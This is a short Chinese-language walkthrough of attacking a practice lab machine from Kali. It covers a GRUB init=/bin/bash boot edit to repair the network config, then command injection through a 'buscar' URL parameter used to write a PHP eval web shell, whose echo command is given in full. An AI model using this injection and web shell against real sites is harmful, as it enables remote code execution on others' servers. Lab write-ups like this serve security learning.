打开靶机，打开kali，有的人会发现扫不到靶机的ip

在网上搜索了半天，发现是靶机的网卡配置有问题

重启靶机，选第二个

进去后再选第二个，按e

找到ro这一行

把ro后面这一行的内容都替换成ro = rw signin init=/bin/bash

ctrl＋x

输入ifconfig -a查看一下自己的网卡名称，我是ens33

在输入

cd etc

cd network

vim interfaces

改下这个网卡名称就好了

按shift＋/

输入wq保存

重启靶机

再打开kali扫描一下就出来靶机的ip了

去访问

我们进入网站以后，首先扫描一下端口，发现没有有用的信息，在扫一下后台，目前也没有什么有用的信息

我们在点击页面上的size

我们翻了翻，发现了点进buscar中页面空白，但是网址上有一个buscar的参数

我们经过尝试之后，竟然可以执行系统命令

那么我们尝试写个木马进去

一开始我写的是echo '<?php @eval($_POST['cmd']); ?>' > mm.php

但是经过测试，会乱码，多次尝试之后把POST中的cmd缩短，并且把单引号去掉就好了

输入echo '<?php @eval($_POST[c]); ?>' > mm.php

在去访问mm.php

检查一下是否写入成功

写入成功！！！